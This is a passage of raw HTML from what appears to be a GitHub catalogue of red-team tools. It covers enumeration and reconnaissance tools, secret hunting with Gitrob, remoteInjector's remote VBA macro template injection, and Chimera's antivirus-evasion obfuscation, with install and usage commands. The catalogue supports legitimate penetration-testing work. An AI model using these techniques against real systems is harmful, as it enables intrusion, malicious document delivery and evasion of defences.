class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e 'Do everything'\u003c/span\u003e\nenum4linux.pl -a 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obtain list of usernames (RestrictAnonymous = 0)\u003c/span\u003e\nenum4linux.pl -U 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obtain list of usernames (using authentication)\u003c/span\u003e\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get a list of groups and their members\u003c/span\u003e\nenum4linux.pl -G 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Verbose scan \u003c/span\u003e\nenum4linux.pl -v 192.168.2.55\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found in this \u003ca href=\"https://labs.portcullis.co.uk/tools/enum4linux/\" rel=\"nofollow\"\u003eblog\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/\" rel=\"nofollow\"\u003ehttps://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
href=\"https://github.com/Esc4iCEscEsc/skanuvaty\"\u003eskanuvaty\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-skanuvaty\" class=\"anchor\" aria-label=\"Permalink: 🔙skanuvaty\" href=\"#skanuvaty\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eDangerously fast dns/network/port scanner, created by \u003ca href=\"https://github.com/Esc4iCEscEsc\"\u003eEsc4iCEscEsc\u003c/a\u003e, written in rust.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou will need a subdomains file. \u003cem\u003eE.g. 
\u003ca href=\"https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt\" rel=\"nofollow\"\u003eSubdomain wordlist by Sublist3r\u003c/a\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDownload the latest release from \u003ca href=\"https://github.com/Esc4iCEscEsc/skanuvaty/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Install a wordlist\nsudo apt install wordlists\nls /usr/share/dirb/wordlists\nls /usr/share/amass/wordlists\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Install a wordlist\u003c/span\u003e\nsudo apt install wordlists\nls /usr/share/dirb/wordlists\nls /usr/share/amass/wordlists\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\"\u003e\u003cpre\u003eskanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca 
href=\"https://github.com/Esc4iCEscEsc/skanuvaty\"\u003ehttps://github.com/Esc4iCEscEsc/skanuvaty\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/j3ssie/metabigor\"\u003eMetabigor\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-metabigor\" class=\"anchor\" aria-label=\"Permalink: 🔙Metabigor\" href=\"#metabigor\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMetabigor is an intelligence tool; its goal is to do OSINT tasks and more, without any API key.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eMain Features:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eSearching information about IP Address, ASN and Organization.\u003c/li\u003e\n\u003cli\u003eWrapper for running rustscan, masscan and nmap more efficiently on IP/CIDR.\u003c/li\u003e\n\u003cli\u003eFinding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).\u003c/li\u003e\n\u003cli\u003eGet Summary about IP address (powered by \u003ca 
href=\"https://github.com/theblackturtle\"\u003e@thebl4ckturtle\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install github.com/j3ssie/metabigor@latest\"\u003e\u003cpre\u003ego install github.com/j3ssie/metabigor@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# discovery IP of a company/organization\necho \u0026quot;company\u0026quot; | metabigor net --org -o /tmp/result.txt\n\n# Getting more related domains by searching for certificate info\necho 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command\n\n# Only run rustscan with full ports\necho '1.2.3.4/24' | metabigor scan -o result.txt\n\n# Reverse Whois to find related domains\necho 'example.com' | metabigor related -s 'whois'\n\n# Get Google Analytics ID directly from the URL\necho 'https://example.com' | metabigor related -s 'google-analytic'\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e discovery IP of a company/organization\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ecompany\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor net --org -o /tmp/result.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Getting more related domains by searching for certificate info\u003c/span\u003e\n\u003cspan 
class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eTarget Inc\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor cert --json \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e jq -r \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e.Domain\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e unfurl format %r.%t \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sort -u \u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e this is old command\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Only run rustscan with full ports\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e1.2.3.4/24\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor scan -o result.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Reverse Whois to find related domains\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eexample.com\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor related -s \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ewhois\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get Google Analytics ID directly from the URL\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan 
class=\"pl-pds\"\u003e'\u003c/span\u003ehttps://example.com\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor related -s \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003egoogle-analytic\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/j3ssie/metabigor\"\u003ehttps://github.com/j3ssie/metabigor\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/michenriksen/gitrob\"\u003eGitrob\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gitrob\" class=\"anchor\" aria-label=\"Permalink: 🔙Gitrob\" href=\"#gitrob\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 
0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe findings will be presented through a web interface for easy browsing and analysis.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eGitrob will need a Github access token in order to interact with the Github API. \u003ca href=\"https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/\"\u003eCreate a personal access token\u003c/a\u003e and save it in an environment variable in your .bashrc or similar shell configuration file:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003eexport\u003c/span\u003e GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Go)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go get github.com/michenriksen/gitrob\"\u003e\u003cpre\u003ego get github.com/michenriksen/gitrob\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eA \u003ca 
href=\"https://github.com/michenriksen/gitrob/releases\"\u003eprecompiled version\u003c/a\u003e is available for each release.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run against org\ngitrob {org_name}\n\n# Saving session to a file\ngitrob -save ~/gitrob-session.json acmecorp\n\n# Loading session from a file\ngitrob -load ~/gitrob-session.json\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run against org\u003c/span\u003e\ngitrob {org_name}\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Saving session to a file\u003c/span\u003e\ngitrob -save \u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/gitrob-session.json acmecorp\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loading session from a file\u003c/span\u003e\ngitrob -load \u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/gitrob-session.json\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.uedbox.com/post/58828/\" rel=\"nofollow\"\u003ehttps://www.uedbox.com/post/58828/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
href=\"https://github.com/sensepost/gowitness\"\u003egowitness\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gowitness\" class=\"anchor\" aria-label=\"Permalink: 🔙gowitness\" href=\"#gowitness\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. 
Both Linux and macOS are supported, with Windows support mostly working.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Go)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install github.com/sensepost/gowitness@latest\"\u003e\u003cpre\u003ego install github.com/sensepost/gowitness@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation information can be found \u003ca href=\"https://github.com/sensepost/gowitness/wiki/Installation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Screenshot a single website\ngowitness single https://www.google.com/\n\n# Screenshot a cidr using 20 threads\ngowitness scan --cidr 192.168.0.0/24 --threads 20\n\n# Screenshot open http services from an nmap file\ngowitness nmap -f nmap.xml --open --service-contains http\n\n# Run the report server\ngowitness report serve\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Screenshot a single website\u003c/span\u003e\ngowitness single https://www.google.com/\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Screenshot a cidr using 20 threads\u003c/span\u003e\ngowitness scan --cidr 192.168.0.0/24 --threads 20\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Screenshot open http services from an nmap file\u003c/span\u003e\ngowitness nmap -f nmap.xml --open --service-contains http\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the report server\u003c/span\u003e\ngowitness report serve\u003c/pre\u003e\u003c/div\u003e\n\u003cp 
dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/sensepost/gowitness/wiki/Usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/sensepost/gowitness\"\u003ehttps://github.com/sensepost/gowitness\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eResource Development\u003c/h1\u003e\u003ca id=\"user-content-resource-development\" class=\"anchor\" aria-label=\"Permalink: Resource Development\" href=\"#resource-development\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
href=\"https://github.com/JohnWoodman/remoteinjector\"\u003eremoteInjector\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-remoteinjector\" class=\"anchor\" aria-label=\"Permalink: 🔙remoteInjector\" href=\"#remoteinjector\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eInjects link to remote word template into word document.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis Python-based utility modifies a .docx file’s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://john-woodman.com/research/vba-macro-remote-template-injection/\" rel=\"nofollow\"\u003eRelated Blog Post\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector\"\u003e\u003cpre\u003egit clone https://github.com/JohnWoodman/remoteinjector\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e 
remoteinjector\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 remoteinjector.py -w https://example.com/template.dotm example.docx\"\u003e\u003cpre\u003epython3 remoteinjector.py -w https://example.com/template.dotm example.docx\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/tokyoneon/Chimera\"\u003eChimera\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-chimera\" class=\"anchor\" aria-label=\"Permalink: 🔙Chimera\" href=\"#chimera\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eChimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. 
